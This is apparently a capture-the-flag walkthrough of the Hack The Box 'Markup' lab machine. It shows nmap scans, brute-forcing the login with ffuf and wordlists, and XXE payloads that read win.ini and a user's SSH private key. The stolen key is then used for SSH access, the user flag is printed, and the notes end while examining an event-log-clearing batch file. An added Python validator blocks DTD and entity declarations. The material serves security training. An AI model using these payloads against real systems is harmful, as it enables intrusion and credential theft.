05.MARKUP
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
ENUMERATE SERVICES
root@htb:~$ sudo nmap -sV -sC -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
| 256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_ 256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
| tls-alpn:
|_ http/1.1
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: MegaShopping
* Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
- adding -sC is another good way to determine service versions
- the -sC option runs safe scripts which are designed to provide useful
information without being too intrusive or causing harm to the target systems.
* -sC runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
* use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
- the -Pn option treats all hosts as online and will skip host discovery
VULNERABILITY SCANNING
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,6789,8080,8443,8843,8880
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.129.140.205:80/
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
443/tcp open https
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
| secure flag not set and HTTPS in use
|_ httponly flag not set
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
| Found the following possible CSRF vulnerabilities:
|
| Path: https://10.129.140.205:443/
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
* --script=vuln runs the NSE scripts in the "vuln" category, which focus specifically on detecting known
vulnerabilities in the services running on the scanned ports
- e.g., weak configurations, or known CVEs in the discovered services (here OpenSSH and Apache/PHP)
- if no results are found then the service may be fully patched!
FOOTHOLD
Submit user flag and root flag.
#walk the application
root@htb:~$ BROWSER > http://10.129.140.205/
username: admin
password: pass
error msg: Wrong Credentials
* login page identified
#conduct code review
root@htb:~$ BROWSER > http://10.129.140.205/ > CTRL+U
* nothing pertinent
#brute force login page
root@htb:~$ find / -iname usernames 2>/dev/null
/usr/share/seclists/Usernames
root@htb:~$ ls
top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ find / -iname passwords 2>/dev/null
/usr/share/seclists/Passwords
root@htb:~$ ls
500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
#retrieve site parameters
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
URL: 10.129.140.205
- Forward requests until the full page is loaded
BURP > BROWSER > http://10.129.140.205
Welcome ...
Username: admin
Password: pass
BURP > Proxy > BROWSER
Requests
...
POST / HTTP/1.1
Host: 10.129.140.205
Content-Length: 28
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.140.205
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.140.205/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
username=admin&password=pass
right-click on the "request" section > copy to file
Filename: requests.txt
File Type: All Files
root@htb:~$ nano requests.txt
...
username=unameFUZZ&password=passFUZZ
j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in
* replace the submitted username/password values with the FUZZ keywords (unameFUZZ, passFUZZ) that ffuf will substitute
root@htb:~$ ffuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r
[Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms]
* passFUZZ: password
* unameFUZZ: admin
:: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
* ensure the keyword names (unameFUZZ, passFUZZ) match in both the ffuf -w flags and requests.txt
* ffuf's default mode is pitchfork matching
- this is where the wordlists are matched line by line
- ffuf can simulate Burp Suite's clusterbomb style through the use of
multiple -w flags (one keyword each) with -request-proto or custom-made
requests using -request.
- clusterbomb combines all permutations of multiple payload positions,
similar to a nested loop over each payload set.
* the -c flag outputs the result in color
* the -r flag follows HTTP redirects during fuzzing
* the -fs flag filters results based on content size
* the -fr flag filters results based on a regex pattern.
#identify potential vulnerable entry points
root@htb:~$ BROWSER > http://10.129.140.205/
username: admin
password: password
* identified orders and contact pages
- the input fields in these pages may be vulnerable
#code review
root@htb:~$ BROWSER > {targetSite:port} > Order > CTRL + U
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Goods & Services</title>
<!-- Modified by Daniel : UI-Fix-9092-->
...
* identified a potential username...daniel
#understand input functions with burp proxy
#analyze intercepted data to see what potential vulnerabilities exist
BURP > BROWSER > http://10.129.140.205 > Order
Type of Goods: default
Quantity: 1
Address: test
* http://10.129.140.205/services.php
...
Request
POST /process.php HTTP/1.1
Host: 10.129.140.205
Content-Length: 111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/xml
Accept: */*
Origin: http://10.129.140.205
Referer: http://10.129.140.205/services.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
<?xml version = "1.0"?>
<order>
<quantity>1</quantity>
<item>Home Appliances</item>
<address>test</address>
</order>
#search for xml exploit
root@htb:~$ BROWSER > https://www.google.com/
search: xml exploitation hacktricks
https://book.hacktricks.wiki/en/pentesting-web/xxe-xee-xml-external-entity.html
#test an xml exploit's validity
BURP > Request > Repeater
Request
...
POST /process.php HTTP/1.1
Host: 10.129.140.205
Content-Length: 111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/xml
Accept: */*
Origin: http://10.129.140.205
Referer: http://10.129.140.205/services.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
<quantity>1</quantity>
<item>&test;</item>
<address>test</address>
</order>
Response
...
HTTP/1.1 200 OK
Date: Sat, 10 May 2025 20:58:28 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
X-Powered-By: PHP/7.2.28
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 144
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Your order for ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[Ports]
COM1:=9600,n,8,1
has been processed
* xml entity vulnerability validated
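Server-side handling that would have refused the request above, as an added Python example (not code from the box or from the page): reject any body carrying a DOCTYPE or ENTITY declaration before the XML reaches a parser, then parse the order with the standard library and validate its fields. The two sample bodies are constructed here to mirror the page's benign and entity-bearing orders; the field rules and rejection reasons are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request bodies mirroring the two orders on the page: the
# benign one, and the one that declares an external entity.
BENIGN_ORDER = (
    '<?xml version = "1.0"?>\n'
    "<order>\n<quantity>1</quantity>\n<item>Home Appliances</item>\n"
    "<address>test</address>\n</order>"
)
XXE_ORDER = (
    '<?xml version = "1.0"?>\n'
    "<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>\n"
    "<order>\n<quantity>1</quantity>\n<item>&test;</item>\n"
    "<address>test</address>\n</order>"
)

# A legitimate <order> never needs a DTD, and the DTD is the only place an
# entity (SYSTEM, PUBLIC or parameter entity) can be declared, so any DOCTYPE
# or ENTITY declaration is refused before the body reaches a parser.
DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
REQUIRED = ("quantity", "item", "address")  # assumed field set for an order

def inspect_order_body(body: str) -> dict:
    """Return {"ok": True, "order": {...}} for an acceptable order, or
    {"ok": False, "reason": "..."} when the body must be refused."""
    if DTD_MARKER.search(body):
        return {"ok": False, "reason": "DTD or entity declaration in request body"}
    try:
        # With no DTD present, a stray &name; reference is an undefined-entity
        # parse error rather than something that gets expanded.
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return {"ok": False, "reason": f"malformed XML: {exc}"}
    if root.tag != "order":
        return {"ok": False, "reason": f"unexpected root element <{root.tag}>"}
    fields = {child.tag: (child.text or "").strip() for child in root}
    missing = [name for name in REQUIRED if name not in fields]
    if missing:
        return {"ok": False, "reason": f"missing fields: {missing}"}
    # Quantity must be a small positive integer; the other fields stay opaque text.
    if not fields["quantity"].isdigit() or not 1 <= int(fields["quantity"]) <= 1000:
        return {"ok": False, "reason": "quantity must be an integer between 1 and 1000"}
    return {"ok": True, "order": {name: fields[name] for name in REQUIRED}}

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_ORDER), ("xxe", XXE_ORDER)):
        print(label, inspect_order_body(body))
```

In the PHP application behind process.php the same principle applies: never pass LIBXML_NOENT to simplexml_load_string or DOMDocument::loadXML, so declared entities are never substituted into the parsed order.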
#LFI (arbitrary file read via the XML external entity)
BURP > Request > Repeater
Request
...
POST /process.php HTTP/1.1
Host: 10.129.140.205
Content-Length: 111
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/xml
Accept: */*
Origin: http://10.129.140.205
Referer: http://10.129.140.205/services.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
Connection: keep-alive
<?xml version = "1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order>
<quantity>1</quantity>
<item>&test;</item>
<address>test</address>
</order>
Response
...
Your order for -----BEGIN OPENSSH PRIVATE KEY----- ... -----END OPENSSH PRIVATE KEY-----
has been processed
#save the private key
root@htb:~$ mkdir -p targets/daniel.10.129.24.24
root@htb:~$ touch targets/daniel.10.129.24.24/daniel_id_rsa
root@htb:~$ nano targets/daniel.10.129.24.24/daniel_id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNz...
-----END OPENSSH PRIVATE KEY-----
root@htb:~$ chmod 400 daniel_id_rsa
#verify private key validity
root@htb:~$ ssh-keygen -l -f daniel_id_rsa
3072 SHA256:OrvhzyMF1OAj02guQWL1vg2TSovi5XIQONohNGrkRzQ daniel@Entity (RSA)
root@htb:~$ ssh -i daniel_id_rsa daniel@10.129.24.24
...
#user flag
daniel@MARKUP C:\Users\daniel> dir Desktop
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of C:\Users\daniel\Desktop
03/05/2020 07:18 AM 35 user.txt
daniel@MARKUP C:\Users\daniel> type Desktop\user.txt
032d2fc8952a8c24e39c8f0ee9918ef7
#privesc
#check current privileges
daniel@MARKUP C:\Users\daniel> whoami /priv
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
* nothing pertinent
daniel@MARKUP C:\Users\daniel> dir c:\
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\
03/12/2020 03:56 AM <DIR> Log-Management
07/28/2021 03:38 AM 0 Recovery.txt
* these are the only two UNCOMMON files
- always analyze UNCOMMON files prior to going into a rabbit hole
daniel@MARKUP C:\Users\daniel> type c:\Recovery.txt
blank file
daniel@MARKUP C:\Users\daniel> dir c:\Log-Management
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\Log-Management
03/06/2020 02:42 AM 346 job.bat
daniel@MARKUP C:\Users\daniel> type c:\Log-Management\job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
* understand the purpose of the batch file and what can be manipulated
- the script uses bcdedit as a quick admin check (bails out if it reports Access denied), then loops over
every event log returned by wevtutil.exe el and clears each one with wevtutil.exe cl